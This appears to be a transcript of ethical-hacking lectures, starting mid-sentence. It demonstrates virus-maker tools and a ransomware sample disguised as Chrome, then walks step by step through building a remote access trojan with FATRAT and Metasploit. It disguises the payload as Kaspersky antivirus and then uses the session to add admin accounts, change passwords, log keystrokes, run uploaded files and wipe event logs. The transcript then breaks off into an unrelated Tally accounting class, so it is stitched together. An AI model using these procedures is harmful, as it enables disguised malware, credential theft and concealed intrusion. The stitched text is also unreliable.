to your data. But let us say you are not paying the ransom, all your data will be deleted or damaged. Now this is the recent thing going on internet, where hackers are trying to make money from malwares or also by infecting your computers. So what we do now is, let us see how hackers are creating these viruses or worms, or maybe how they use ransomware to infect your computers. And then we'll discuss about other kind of malwares. So here I have some virus making tools. So I'll be using this application called JPS Virus Maker. Now here, as you all can see on the screen, this is how the application window looks like. So this is JPS Virus Maker.
it helps us to create a virus and infect someone's computer. Now, JPS Virus Maker gives you with some options which you can choose from. Like say you want to build a new PC. So you'll be given with options like, do you want to have a Core i3 processor or a Core i5 processor or a Core i7 processor, how much RAM you want, what sort of a hard drive is required, and all. So you have choice there. In the same way, as a hacker, when you want to make a virus, you are also given with choice of different options by these virus making tools. So here I can choose some options like disable access to registry or disable access to task manager. So here when we say disable access to registry or task manager, it is like I'm stopping end user from accessing these things, stopping the end user from accessing the registry or the task manager. So this is what I was speaking of about a rootkit. It stops you from performing some normal or genuine activities. And then I can also say disable group policies. So any sort of group policies that are applicable on your computer will be disabled. Or I can say disable Norton or McAfee antivirus. So if your computer has Norton or McAfee antivirus installed, that antivirus service will be stopped. Or I can also say something like disable DHCP client. So on your computer, the DHCP service will be stopped. So it will not be able to request an IP address from your DHCP server. Or I can also say disable command prompt. So access to command prompt will be disabled. Or we can say disable access to security center. So your Windows updates, your Windows firewall or your Windows Defender, all these services will be disabled. So like this, I'll be able to disable certain services, like say system restoration. You will not even be able to restore it back to a previous state. So this is how I'll be able to disable certain things on a user's computer. Not only disabling something, I also have some other stuff like say always CD-ROM. So when this option is selected, your CD-ROM tray is always open. You will not be able to close it. So if your CD-ROM tray is always open, you will not even be able to reinstall your operating system through a CD or a DVD. Or I can say turn off monitor. So your computer is working fine, but you don't see any display. So that's the option with turn off monitor. Or we can also say terminate Windows. Terminate Windows will completely damage your Windows operating system. So now, though it is a virus making software, it can give you with options of either a rootkit or a virus. And then you can choose some name. Let me say I'll choose a name as Office 2016.exe. So I'm choosing the name as Office 2016.exe. And in the advanced features, I will also choose an icon as a .exe icon and say create a virus. Now it has given us a confirmation that a virus program was made. Now let us go back and check the virus file. So here, this is how you have Office 2016 package. So this you will be able to distribute it to the end users, maybe through a file sharing service or through torrents, right? And once the end user downloads and runs this application, assuming that this is Office 2016, his computer will be infected with a virus, and all the things what we have selected, like destroying Windows operating system or maybe stopping the user from accessing certain services, what all things we have selected, all that will be affecting the user. Now this is with JPS Virus Maker, a free software. Similar to this, we also have something like Necro Virus Maker. So this is how we have the application as we see on the screen. So more or less all your virus making tools will give you with similar feature set. So here we have some options like destroy Windows. So when we say destroy Windows, your operating system will be completely damaged, right? Or we can say like destroy explorer.exe. So when we say destroy explorer.exe, it will just try to damage your Windows Explorer or the GUI application. And then we can select to make a virus. So that application will automatically generate a virus and show us the result. Now similar to this, we also have something called Poison Virus Maker. Now again here we have some options like adding the virus to startup. So whenever you power on the computer, virus is also activating itself. And then here I can say add 30 user accounts to the computer.
So now on your welcome screen, you will see 30 different user accounts available there. And then I can say change password. So for the default user account, whatever you have already created on your computer, the password will be changed. So now it is activating the virus along with your operating system, and then it is also adding up 30 different user accounts onto the system, and then it is also changing your password. Now I will also be able to select an option, shut down computer after 1 minute. So now just imagine the scenario, you have downloaded a software, maybe MS Office crack or maybe your Windows 10 or Windows 8 crack. You have installed it, and then it is asking you for a reboot. So once you restart, you see that on your login screen there are so many different user accounts which you had not created. You did not create it, but you are able to see all that. And then you try to log into your computer from your user account by typing in password and all. Then you realize that your password has been changed. It's not accepting that password. And by this, it will already be at least 1 minute for all these things to happen, and your computer will automatically shut down. So this is how hackers will be able to make viruses to damage your data, or not to damage your data. Hacker can directly say destroy your Windows operating system, or he can simply say like destroy computer. Now when he says destroy computer, all the data that is related for your operating system to function will be damaged. So now your computer will not have your operating system, so you just have to reinstall everything. Reinstall your operating system, reinstall your drivers and all the application programs and all this. So this is how hackers will be able to make some viruses using ready-made tools. So to create a virus, you don't need to be a programmer. And then let us see about ransomware. So here I have a ransomware application. Now I'll show you what actually happens with this ransomware application and how someone can damage our data. So here, as you can see, I have an icon, something looks like a Google Chrome browser. So I can just send this particular application. Again, it's not very large, it's just 675 KB. So I can directly send this application to an end user saying like this is a Google Chrome standalone version, or maybe I can say like this Google Chrome has been modified to help you hack into someone's Gmail accounts or Facebook accounts. I'll just upload it to some website, or maybe I'll send it via torrents, and once a user downloads and tries to run this, so it looks like Google Chrome, so I'll just try to run this application. So here, once you run the application, you can see here on my screen there is a warning message given saying that all your important files have been encrypted. Now it is also saying that if you want to restore your files, you will have to pay for our special software which can decrypt it. Now he is also giving you with their email addresses on how to contact them, how to communicate with them. Now here if you check with different sort of icons which are already present on my computer. Now see this, when I try to access my Tor browser, it's already encrypted. So the data is encrypted and I will not be able to access this. So it doesn't work. Now see here, I have my Notepad application which has some content, but see this, all the data has been changed into some unknown format. I will not be able to use it now, right? So that's how a ransomware will try to encrypt all the user data to an unknown format or an unreadable format. So if your computer has been infected with a ransomware, all your data is lost unless you are ready to pay for the decryption key. So now let me show you what actually happens for the decryptor. So in case you have communicated with the hacker and you are ready to pay whatever the ransom that hacker is asking you, hacker would give you with a decryption software like this. So you just have to run the decryption software, and then this decryption software will try to bring back all the data to a normal format. So this is the decryptor. So all I have to do is just try to run this application. So I'm just trying to run the application, and here as you can see, my Windows background and everything is restored back to the normal format. And see this, my Tor browser application is back, and also my Notepad application
everything is back to the normal working state. So now if I again try to run this ransomware application, I'll just try to run this again. So I'm just trying to execute it. Now see, again everything is back to the previous state, and here when I check with the Tor browser, it doesn't work, or I'm trying to reopen my notepad, it's showing me with all some garbage data. So you'll not be able to read and understand what actually it is. So here if you have to get back the information, you just have to run the decryption tool, which will give you back all the data on your notepad application. Again everything is back to the normal working state. Your Tor browser application, so again it is back. So this is how hackers are trying to use ransomware to encrypt all your data and make sure that you will not have access to it. Now if you want to get back access to the data, only way is pay the ransom to hackers and then get back access to your data. So here when you speak of different types of malwares like viruses or worms or even this rootkits or ransomware, how does our computer get infected with this? How do we get all these infections on our computer? So here the first source of infections is from end users activity. So we ourselves are actually the main reason why our computers are getting infected. So here if you are trying to download and install some softwares from an unknown website or a third party website, generally what happens, like I see most users are trying to download pirated softwares or pre-activated versions, or maybe the keygens or activators and all. Now what actually happens here is, assume like you are trying to download a software, assume you have installed MS Office. Now Microsoft is actually asking you to pay some licensing fee for MS Office and access that, but end user is not interested in paying for the license fee. So instead of paying for it, end user says, let me go to a third party website and download a crack or a keygen or an activator. Now who is making this activator or who is making this keygen or a patch? Obviously that should not be from Microsoft, and that is from a third party. Now when someone else is making a keygen or a patch, they also have to put up their efforts, maybe for some days or weeks. Now when they are working on a software maybe for 10 days or 15 days, is it like really they'll give you for free? So they have been working for 15 days to make a software, and now they are giving it for free, they are distributing it for free. So don't we suspect that there is something wrong here? So here what actually happens, the guy who has given you with this keygen or activator or a patch would have attached a malware, maybe a virus or a rootkit or maybe a ransomware, so that he'll make money from it, or he'll try to damage end users data. But in most cases end users are not aware of these drawbacks or not aware of these problems. So what they always think is like, okay, I'm just going on to a third party website, I'm trying to download a virus, I'm trying to download a keygen or a patch or an activator, and from this I'm just trying to activate my software, I'm not going to pay for any sort of license. But unfortunate thing is, end user is not realizing that whatever the patch or keygen that he is downloading from a third party might have some impact on his computer, that is by damaging the data or by locking down all the data in case of a ransomware. Now last year we have seen that there is a ransomware attack, WannaCry, and millions of computers which belong to home users as well as corporate networks have been infected, and all the data was being encrypted. Now hacker was demanding everyone to pay some money in terms of bitcoins. So again here they are trying to use some cryptocurrencies so that no one will be able to trace where is the money going into and who is taking this money, who is having access to the money and all. So end user is given with a warning message similar to what we have seen now, saying like you'll have to pay in terms of bitcoins with a money which is equivalent to some $300. Now there is a thing like some millions of users, if they want to get back access to the data, they'll have to pay $300 each to the hacker. Now just see what kind of things are going on internet. Now in most cases we are not really aware of what actually is happening there.
So even if we see with the last few sessions what we were discussing, hackers are trying to capture our passwords when we are logging into some website or we are logging into some online account or a net banking account or somewhere. Hackers are also trying to steal our passwords by using phishing websites. Just by hosting a fake website, hacker is trying to steal our user IDs and passwords. Or maybe hacker can give us with a keylogger. Now this keylogger tries to steal all the user IDs and passwords, what all things we are typing on our computers. Or maybe hacker can use a virus or a worm to damage our computers or the data, or to slow down the performance, to bring down the performance of a system. Or maybe hacker can use something like a ransomware to damage the content, make money from it. So this is how hackers are using different sort of malwares to destroy users' data or users' computer. So in our next session we will be discussing about few more malwares like rats, and then we will see how actually a rat can be used by hacker to compromise users' data or to take over the full control of it. So in today's discussion we had a discussion about viruses, worms, rootkits and ransomware. Thank you all. Welcome back to our discussion on malwares and how hackers are using malwares against our computers to damage the data or to completely damage the operating system. So in our last discussion we were discussing with viruses, worms, trojans, rootkits and ransomware. So now we will discuss about trojans and rats. So here trojans or rats come under the category of backdoor applications, wherein a hacker can try to take control of our computer or our resource, maybe like a mobile phone or our servers, using these trojans or rats. So speaking of a trojan or a rat, these two applications, they contain two different modules. So first let us discuss about trojan and then we will see about a rat. So here when we consider a trojan, Trojan or Trojan horse contains two different modules. We will have a server module and a client module. So here we will have a server part of the Trojan and also a client part of the Trojan. Now the server part of this Trojan will be sent to victim. That is, hacker will send the server part of the Trojan to us, end users. Maybe he can attach it to any genuine software, or maybe he can bundle it as a crack or a keygen or a activation patch, and the client part will be there on the hacker's computer. Now the server part will be designed in such a way it has to open up a port on our computer. Now like if we are hosting a HTTP server or a web server, we will have port number 80 open on the machine. In the same way, the server part of the Trojan is designed to open a port. Let us say it is trying to open up a port number as 4455. So now on the user's computer or on the victim's computer, we will have an open port as 4455. Now client or the hacker using his client part on the Trojan will have to initiate a connection, will have to send a request to victim's computer on port number 4455, which will accept the incoming connection and also hand over the full control to victim. So here full control of the victim's computer will be handed over to hacker. But there is one particular restriction in these Trojans. Now here when I consider I have a network set up like this. So from ISP my internet connection is terminated onto a router. So this can be on a corporate network or maybe a home network, and from router I am having it onto my LAN network, and this is a victim's computer. Now let us say victim's computer has an IP address 192.168.10.10. Now router, it has a inside interface IP as
192.168.10.1, which is a default gateway for the victim's computer IP address, and ISP has given a public IP address here on the victim's side as 216.208.49.6. Now let us consider this is a hacker's computer which is somewhere on internet. Let us say hacker has an IP address something like 1.44.145.97. Now here the problem is, on the victim's computer we have the server part available, and there is also an open port 4455. Now on the hacker's computer we have the client part. So now as per the Trojan, client has to initiate a request onto the server part, means request should be initiated from the hacker's computer to the victim's computer. But here, as we can see with the kind of topology or the kind of network setup that we have, or that what we generally face in home networks or even in a corporate environment, if a hacker has to take control of the victim's computer, he needs to know what is the IP address of the victim's system, because without knowing the IP address we will not be able to establish any kind of connectivity or any kind of session to the victim's computer. But unfortunately there is no way that hacker can identify what is the IP address of the victim's computer. So because of this, a Trojan will not be successful over internet. So this will be working only in the LAN network or in the local network. But if a hacker plans to take over control of a victim's computer over a public network like internet, hacker will have to go with an alternate, that is RAT. So RAT stands for Remote Access Trojan. So RAT also contains two parts similar to a Trojan. So it also has server and client parts, but this time the server part will be there on the hacker's computer and the client part will be present on the victim's computer. So hacker will have to send the client part of the RAT to victim, and server part will be running on the hacker's computer itself. So this is opposite to what was happening earlier in Trojan. In Trojan we were saying the server part is there on the victim's computer and client part is there on the hacker's computer. But here in case of a remote access Trojan, the server part is present on hacker's computer and client part is present on the victim's computer. Now as we all know, client has to initiate a request to the server. So here you will be receiving a request from the victim's computer. So hacker will receive a request from the victim's computer and then he will have full control over the victim's system. So here, with all different attacks what we have been seeing so far, we have seen that hacker is always launching an attack on the victim's computer. But here, victim's computer itself is connecting back to the hacker's computer. So this we call as reverse TCP connection. We call it as reverse TCP connection. Now in general, it is like hacker always try to access victim's machine, but here victim itself is connecting back to the hacker's computer. So now here we are just changing the location where the client and server is present. So now we don't have the server on the victim's computer, but this time server will be present on the hacker's computer. So on the victim's machine here we have the client part and the server part is on the hacker's machine. Now as we say, client has to initiate a request to server. As long as this computer, as long as the user computer is able to access internet, your reverse TCP connection will always be successful. Right. So now using reverse TCP connections and RATs, hackers are actually able to launch an attack and take over control of the users' computers or maybe their mobile devices and all. So now we will see how do we actually create a RAT, how do we create the client and the server part, and how do we go with this. Now to use a RAT or to create a RAT, it is not directly possible on a Windows computer because the RAT application whatever we use from Windows operating system
will be identified and blocked by your antivirus applications. So to overcome this particular restriction, hacker will have to use something called Kali Linux. So Kali Linux is a Linux operating system which is very specially designed for launching attacks onto some user's computer. So this has been very specially designed for penetration testing and auditing. So let us see what actually Kali Linux is and how does it work. So here when we speak of Kali Linux, as we already discussed, this is a specially designed Linux distribution meant purely for penetration testing and forensic investigation. So it is designed for penetration testing and forensic analysis. And Kali Linux is a successor to Backtrack Linux operating system. So initially there was an operating system called Backtrack. So Kali Linux is an update or a newer version to Backtrack operating system. And now this Kali Linux is actually based on a Linux flavor called Debian Linux. So now generally when we speak of Linux, we have two major distributions. One is based on Red Hat flavors and other is based on Debian. So when we speak of the most widely used desktop operating system for Linux environment, say Ubuntu. Ubuntu is actually based on Debian, and Kali Linux is also based on Debian itself. Now earlier Backtrack was actually based on Ubuntu. So just to make the development and all the things faster, developers have directly started using Debian as a base platform for Kali Linux. Now let us see what actually Kali Linux is for and why it is different from other Linux operating systems. So generally when we speak of Linux operating systems, we always come across the name as Red Hat or Fedora, CentOS and all, but these versions are completely different from Kali Linux. Now Kali Linux, as we already said, has been designed only for penetration testing. So Kali Linux cannot be used for our day-to-day activities. This is designed for penetration testing. And this operating system, Kali Linux, has been designed right from the kernel level to support all the applications that require root privilege. Now here when we say root, this is actually equivalent to administrator privilege in our Windows computer. So here even if we say with the discussion between Windows or Linux, which is better or which is more secure, in most cases people always come up with a conclusion saying that Linux is better than Windows in terms of security. And that's actually true for the old versions of Windows and all, because Windows was designed in such a way that most of your applications are running as an administrator. So even if there is a malware infection, that malware infection also gets administrator permission on your computer. That's not the case with a Linux operating system. So Linux, you will not have root permission for any application. You will be using this as a normal user. But when it comes to Kali Linux, we require root permission for every application. So this is quite opposite to how Linux operating systems work in general. In general, Linux operating systems does not use or does not give root permission for any application. They are all running at the user level. But here in Kali Linux, because it was designed specially for penetration testing, that is, in short, this has been designed for launching attacks and testing how secure a system or a server is, we would require root permission for every application. So right from the kernel level, this operating system has been redesigned or has been rewritten to support root privilege with every application here. And then Kali Linux also comes with tools that are pre-installed. So if you have seen with our past few sessions, when we are using Windows operating system, maybe for footprinting or scanning, launching an attack, or maybe even for something like sniffers. So we have all the tools downloaded from internet. So we'll have to download it from a third-party developer website and then install it. So these tools are not pre-installed in Windows. But here when it comes to Kali Linux, all the tools that are required for launching attacks or performing any sort of penetration testing, they are all pre-installed. So when you download and install Kali Linux, all the tools and the required frameworks for launching a penetration testing is already present. They are already available.
and Kali Linux is not intended to be used as a daily driver. So this is not a Linux operating system which we can use for our day-to-day activities like say Ubuntu or CentOS. So we can use Ubuntu or CentOS or Red Hat, Fedora and all for our day-to-day activities. But Kali Linux is not an operating system which was designed for day-to-day activities or day-to-day operations. Now we will see what actually this Kali Linux can be used for. So this can be used for auditing a host or a network for finding out vulnerabilities. So you can either use some tools which are available in Windows platform, or you will also be able to use Kali Linux operating system to launch attacks or to perform penetration testings. Now Kali Linux can be used as a pen testing tool. It can also be used to launch exploits against vulnerable host. Kali Linux can also be used to perform simple activities like footprinting or scanning and all. So if you are not going to use Windows based applications or tools, you will still be able to do it from Kali Linux. And Kali Linux can also be used to crack passwords of wireless networks. So here Kali Linux can be used for multiple purposes. It can be used for performing footprinting or scanning or trying to launch an attack, or can also be used to understand what vulnerabilities are present on a machine, can be used to crack your passwords, can be used to crack into wireless networks, can be used as a phishing tool. So Kali Linux has all the required tools or the required frameworks which will help us to perform these attacks and compromise a machine. So here we will be using Kali Linux operating system now and try to create a RAT. So we will be using Kali Linux to create RAT. Both the client part and the server part will be created now using Kali Linux, and then we will try to perform this attack. Now to do this, we will use few frameworks or few applications in Kali Linux. So here I am going to use a framework called Metasploit framework. So I am going to use Metasploit framework in Kali Linux to launch the attack. Now Metasploit will give me with options of creating the client part as well as the server part, and also to accept incoming connection and take full control of a victim's computer. So here I will try to launch an attack on a Windows based victim. So here for Metasploit I have to run this particular service. Now Metasploit is already pre-installed, as we already said. Kali Linux comes with all the required applications and frameworks, but Metasploit is purely a command line based approach. So you have to remember all the commands and you will have to follow the proper syntax and type the commands. Now if you are not so much comfortable with remembering all the commands and the syntax to be followed and all, then you have a package called the FATRAT. So this particular package, the FATRAT, helps you to create the client part. So this helps you to create the client part of the RAT, and then using Metasploit console, we will try to create the server part. So now we will be using this FATRAT package and also the Metasploit console to create the client and server part respectively, and then see how we can perform an attack and take over the control of a user's computer. So let us start with the Kali Linux. So this Windows 7 machine will be our victim, and then this is our Kali Linux machine which will be used for performing all these activities. So Kali Linux is mostly based on command line approach. So here I just have to verify if I have a proper IP address assigned on my computer or not. So to check the IP address, we will be using the same command as Linux operating system, ifconfig. So when I say ifconfig, here it is showing us with what is the IP address assigned on our computer. So I have an interface called ETH0, which is my Ethernet, and the IP address is available as 192.168.1.63. Then I should also check whether I am able to reach internet or not. To do that, let me just try to ping
8888. So here as you see we are getting a response. It's good. We are also able to reach internet. So now let us start with the FATRAT package. So to start FATRAT package, I have to give a command FATRAT. So just have to give a command as FATRAT. So now FATRAT application would start checking for all the required dependencies, and if everything is okay, it will start the required applications. So here it says like whatever the client package that you are going to create, do not upload this to VirusTotal. That's because once you are uploading it to VirusTotal kind of website, your antivirus applications will come to know how FATRAT is working and they will try to block it. So we should not upload this to VirusTotal. So just continue. Now here it is going to create the Metasploit services. So here as we can see on the screen, once the FATRAT package is initiating, it gives us with a menu option. So here as I said, I'll be trying to go with attack towards a Windows operating system. So here I'll be using option number 6, that is trying to create a fully undetected backdoor using PwnWin's application. So FATRAT has different applications inbuilt. So here I am going to use something called PwnWin's, which will help me to create a fully undetected backdoor. Fully undetected because this will not be identified by your antivirus systems. So here all we need to do is just choose the option. So here as we can see, FATRAT has given us with many options. So we just have to choose the option number here. So I'm choosing the option number as 6. Now it goes on into the menu for PwnWin's application. Now here it says what exactly you want to do. Do you want to create a batch file along with PowerShell scripts, or like do you want to create a C# file or a Apache related file, that is a .exe, or do you want to create a .exe using C and PowerShell? So it gives us with different options, but say I'll go with the first option wherein I'll be creating a batch file along with PowerShell scripts. So option number 1 is being chosen. Then it says you have an IP address as 192.168.1.63 on your computer, and you also have some public IP address, but if you have purchased a public IP from ISP, you can use it, but if your public ISP is not purchased, it's better you go with the private IP. So I'm going on with the private IP address here. So I'm just defining the private IP address of my system as a listening host. So here listening host means which IP address should accept incoming connections. So here as we have said, we are going to create the client part of the Trojan using FATRAT. Now the main responsibility of the client part is once it is downloaded and executed on the victim's computer, it has to connect back to the hacker. So in the client part, we are defining what is the IP address of the hacker's computer. So here I am defining it as my computer's IP 192.168.1.63, and then the next question is what should be your listening port, on which port your client has to connect back. So I will take up a port as 4455 as per our example. So on port number 4455, victim's computer has to connect back to hacker's computer. And then it says like what will be the name of your application. So I can say name of my application as KAV, so that I can tell the end user that this is Kaspersky antivirus. So user would also believe it, okay, that this is Kaspersky antivirus. He is trying to download and install or download and run this. Then finally it is asking you what will be the payload or what will be the kind of attack. So here I will choose the attack as Windows Meterpreter reverse TCP. I am choosing the attack as Windows Meterpreter reverse TCP. So we have already discussed that reverse TCP is a connection where victim's computer is connecting back to the hacker's computer, and now we are trying to target a system which has Windows operating system installed. So I am going on with option number 3, that is
the payload will be Windows Meterpreter reverse TCP. Now it tries to create the required client path. So let us wait for the application to be created. So once you are back into the menu, it means that your client path has been generated. So now let us minimize this FATRAT package. Now we don't require this. Now let us go back to our home folder. So within the home folder here we have the FATRAT folder. Within FATRAT folder we have output. So here we can see this batch file, that is a kav.bat. So this is the file what we have created. So now I will distribute this application to my victim, saying that this is Kaspersky antivirus installer. You can download and install Kaspersky using this. Okay. Now I can either upload this into a file sharing site, give them with a download link, send it via torrents, or I'll just put it on my web server. So by default Kali Linux comes with Apache server pre-installed. So I'm just trying to put up the application here. Now this is how my web page looks like. So just says if you want to download Kaspersky antivirus, you can click on the link. So when a user clicks on this particular link, he will be able to download the Kaspersky antivirus application from my system. Now here, what actually is this Kaspersky antivirus as per the hacker? That's nothing but the client part of a RAT. So far what we have done is we have used FATRAT package to create the client part, and then we have also pasted this particular client part onto the default location of our Apache server. Now the next part or the next step is to prepare the server part. So now we have to prepare the server part so that we can accept incoming connections from the client computer or the victim's computer. So to do this, we give a command msf console. So here we don't have any package like FATRAT where we just have to choose some options. We'll have to remember and type the commands for creating the server part. So once we give a command msf console, Metasploit framework will be initiated, and here you can also see the difference in the prompt. Instead of saying root@Kali, which is telling you what is the username and what is the system name, now the prompt says MSF. So that stands for Metasploit framework. So now let us start creating the server part. So to create the server part, our command goes like this. We can say use exploit multi-handler. So here exploit is a script or the service which is being used. So multi-handler is a service which is available in Metasploit framework, which will help us to accept incoming connections. But incoming connections from what? So here we'll have to be very specific about incoming connections from our Meterpreter sessions or the Windows reverse TCP. So we say set payload. So this is the payload what we have given in the application as Windows Meterpreter reverse TCP. So we are going to define the payload as Windows Meterpreter reverse TCP, and then we have to say set listening host or L host as our Kali Linux IP address, which is 192.168.1.63. So we are telling the multi-handler application that if requests are initiated by a payload called Windows Meterpreter reverse TCP and the sessions are coming in towards 192.168.1.63 on a port number which is defined as L port, say 4455, you have to accept it. So we are telling the multi-handler application if request is initiated by a payload Windows Meterpreter reverse TCP onto an IP address 192.168.1.63 on port number 4455, accept it. So when we say exploit -j, now your server part is initiated and it is ready to accept any incoming connections onto your hacker's machine. So far using FATRAT we have created the client part, and then we are also placing this in the default root location of the Apache server,
And now we have also created the server part using Metasploit console. Now we just have to wait for end user to download and run the application. So once he is able to download and run the application, we can take over full control of the victim's computer. So now let us go back to the victim's machine. So here let me just try to access the hacker's computer 192.168.1.63. So here we are able to view the same web page that's hosted by the hacker. Now here I will say try to download this Kaspersky antivirus application. Now this is what generally happens with all of us. We go to internet, we start searching for some website where we can download a cracked version of antivirus or a cracked version of Windows or MS Office or something. Then we end up downloading the software from an unknown web page. So once we download this, let us just try to execute and run this. Now here as you can see, there was just a flash of a command, some random characters have been shown and then it has disappeared. Now as an end user, we are still not sure whether Kaspersky installation has started or not. So what generally we do is we keep waiting. We just keep on waiting for Kaspersky application to start the installation procedure. But what we did not realize is once we download and install the application, our computer has sent a request back to the hacker's computer. Now here we can see that there is a request coming in from 192.168.1.33 towards 192.168.1.63. So victim's computer has sent a request to the hacker's computer, and unfortunately victim is not aware of this. So here hacker can directly get connected to the victim's computer by giving a command sessions-i space 1. So here this is a first session or this is a first computer which is connected to the hacker. Assume there are 10 computers connected, hacker can choose that particular number and he will have direct access to that particular system. So once connected, now we have direct access to the Meterpreter session. So here we can use some commands to view what is the content of the victim's computer. So the first command I will use is something like sysinfo, which tells us details about the victim's computer. So it says the computer name is CS Pro PC. Operating system is found to be like Windows 7, build version 7601 and service pack 1 is already installed there. And it says the architecture as x86, means it says that yours is a 32-bit computer. And then it also tells the language of the computer as English and the time zone configured as IN, that stands for India. And it says the computer is part of a work group, it is not belonging to any domain. And it also says currently one user is logged into the user. So one user is logged into the system there. So this is how we get all the details about the system. Now not only with the system, we can also give a command like screenshot. So it will try to capture a screenshot and save it on our home folder. So a screenshot of whatever is visible on the victim's computer. So now let us access the home folder and view the screenshot. So this is how it says this is available on the victim's computer. So once we go back to the victim's machine, yes, that's the same thing. And when all these activities are being done by hacker, victim is not aware of any of these activities. So now let us see what else we can do. I'll give a command shell, and if you recognize this prompt, we now have direct access to the command prompt of the victim's computer. We are directly accessing the command prompt of victim's machine. Now let me give a command net user. So it tells us how many user accounts are present on the victim's computer. So it says there is a user account called administrator, there is a user account called CS Pro, and there is a user account called guest. So there are totally 3 different user accounts present here. Now let us verify this by going back to the victim's computer. So let us see like how many user accounts are actually present. So here as we can see, administrator, CS Pro and guest. There are 3 different user accounts. Good. Now hacker will also be able to create a new user account here. So I am saying a command as say net user Raghu,
and I'm giving my password as raghu@123/add. Now here it also says that my command is successfully executed. So now there should be a new user created on the user's computer, on the victim's computer, called Raghu, and password of that user is raghu@123. So now let us check that. Let us go back here and just try to refresh this. Now here we can see that there is a new user account called Raghu. So here there is a new user Raghu created, and when we look into the properties, this user is actually not an administrator, he is only a normal user. Okay, so now we will see if we can make this user as an administrator, or we can promote him as an admin. So let us go back to the hacker's computer, and then we say net local group administrators. So into this particular group administrators, we are adding the user Raghu. Now it says again your command has been successfully executed, so that's good. Now if we go back to the victim's computer and look into the properties of this new user, now this person is part of administrators group as well. So he is not just a normal user now, he is also part of admins group. So this is how hacker will be able to create new user accounts on your computer, or he can also change over the password of the existing user. So I can say net user CS Pro. So this is a user account which is already present on the system. And now for this user account, let us say I'll change the password as 1234. So I don't know what is the actual password of the user account. I don't know what is the original password, but the password has been changed to 1234. Now here if we look into the victim's computer, we don't see anything suspicious. You don't see any activity happening there on the victim's machine. So not only accessing the command prompt, hacker will also be able to remotely initiate a keylogger. So we can say key scan start. So once we say key scan start, it will automatically start a keystroke sniffer on the victim's computer. So now let us say on the victim's computer I am just trying to access something. So I am trying to access this particular web page, Twitter, and let me give a username as test@yahoo.in and password as 12345. So this is only a keylogger, so I don't have to log in there. So now let us see if these keystrokes have been captured by the hacker or not. So I can say key scan dump. So here as we can see, user has been typing Twitter and control written, that is control enter to access the web page, test@yahoo.in. So that was a email address given, tab to go into the next field, and the password was given as 12345. So without the knowledge of end user, hacker is also able to capture all the passwords of an end user there. And not only with trying to steal the user IDs or passwords, hacker would also have full access to victim's computer file system. So here when I look into present working directory, it says that currently I am into the C drive of the victim's computer. Now I can check for all the applications or all the files that are present here by giving the command ls, similar to what we do in Linux environment. So here if you see, it shows us with all different files and folders that are available on the C drive of victim's computer. So here there is a file called autoexec.bat. So let us try to download this from victim's computer to our computer. But before we do this, let us access our home folder to see if we have any file with the name autoexec.bat. So here as we can see, there is no such file. So now let us try to download it from the victim's computer to our machine. So download space whatever the file name you require, autoexec.bat. So here as you can see, you are able to download that particular file onto your computer. So now let us go back to home folder and check this. Now see, here we have this file autoexec.bat. Now
in the same fashion, like how we are downloading these files, we will also be able to upload it. Let's say I'll upload a file with the name as keylogger.batch. So I can say upload keylogger.batch. So a new file with the name as keylogger has been uploaded. Now this is a batch file. Now let us verify the files on victim's computer now. So when I give a command ls, here you can also see that there is a new file called keylogger.bat, which is a batch file. Now this can be a virus, this can be a keylogger, this can be a worm, this can be a ransomware or a rootkit. So not only downloading or uploading some contents to the victim's machine, we will also be able to remotely execute it. Execute -f keylogger.batch. So I'm also trying to execute it, and here as we can see on the screen, a new process has been created on the victim's computer. So now without the knowledge of victim, without the knowledge of the end user, you have full access to the file system of the machine. You are able to download some files, you are also able to upload something, and you are also able to execute it. So here if you look into this, you are able to access all different files on the system. You are also able to download or upload contents. Not only this, if victim's computer has a web camera connected, you will also be able to click a picture from this command using webcam snap. So when you give a command as webcam snap, it tries to click a picture from the web camera. So here there is no webcam connected on the victim's machine. So it gives you an error that there is no web camera available. But if there is a webcam connected, assume victim is using a laptop where it has a camera built in, you will also be able to click the picture. You will also be able to say record mic and give the duration, let's say 120. So for the next 120 seconds, it will start recording all the conversation or all the sounds that are happening near the victim's computer and send the audio to you. And before you disconnect from the victim's computer, you can also give a command clear EV, which tries to clear all the logs on the event viewer. Now event viewer is something on victim's computer, or say any Windows computer, which has all the logs. So here when we access event viewer, here we will be able to see all different logs. So here there are some 1600 logs related to different applications on my Windows computer. Or if I look into my security related logs, there are some 1400 logs available, right? So like this, my operating system saves all the logs about my computer or about my operating system on what all things are happening here. But now victim has downloaded an application without his knowledge from a third party, and hacker is also able to remotely control his machine. Now see, once we give this command clear EV, all the records are deleted from the victim's computer. So all the logs have been deleted. Now once we go back to the victim's computer here, now let me just try to refresh and see if we still have some logs. So now see, there are no logs available. So everything on my event viewer has been deleted. So as an administrator, I don't have any proof of what actually happened on the computer. I don't have any log which says that so and so activity happened, or some application was installed, or something went wrong on a machine. So like this, when you download and install an application from an unknown source, without your knowledge, you will be able to download and install, and without your knowledge, someone can just try to remotely access your computer and do all the damage. So here, the only mistake that end user has done is downloading and installing an application from an unknown source. So in the same fashion, just imagine when you are downloading some softwares, maybe it can be an antivirus application, or it can be a crack for your Office package, or maybe a crack for your operating system, or something else. If you are downloading any sort of pirated software, a crack or a key generator, imagine how dangerous it is.
And now here, as we can see, though we have been doing multiple activities, there is no clue of what is happening on his computer. So end user is not aware of what all things are happening there, and everything seems to be working fine. So you will never realize what actually a hacker is trying to do on your machine without your knowledge. Right. So always be careful when you are downloading some things from internet, because when you try to download and install a software, maybe it is a Trojan, or maybe it is a rat, maybe it is a ransomware or a rootkit or a virus which is trying to damage all your data, or maybe take over full control of your session. Right. So this is how rats can be used by hackers to take over full control of a victim's system. So that is with today's discussion. Now in our next session, we will be discussing about how hackers are using rats to take over control of mobile phones. And nowadays these kind of attacks are actually increasing in number. Hackers are trying to take over someone's mobile phone into their control and then have access to all the data. So that we will be discussing in our next session. Thank you all. Hello, good morning students. Welcome to Mana TV. Welcome to Tally training program conducted by APSSTC. Right. In the yesterday's class, we have seen about the vouchers what we have in Tally. So almost all we have discussed about 13 to 14 voucher types. Right. అంటే నిన్న టైంలో మనము వోచెస్ ఎన్ని రకాలు ఉన్నాయి, అది ఏ టైంలో యూజ్ చేసామనేది మనం నిన్న డిస్కస్ చేసాం, ఒక థియరీ పార్ట్. రైట్. Today we are going to discuss about all the vouchers, how to use those vouchers. Yesterday what we have discussed, that all vouchers now we are going to discuss in a practical mode. Right. So నిన్న మనం ఏదైతే 12 vouchers types చూసామో అవి వాళ్ళ టాలీలో ఎలా చేయాలి ఏంటి అనేది మనం డిస్కస్ చేస్తాము. సో దాని గురించి నేను ఒక ప్రాబ్లం డిజైన్ చేశాను 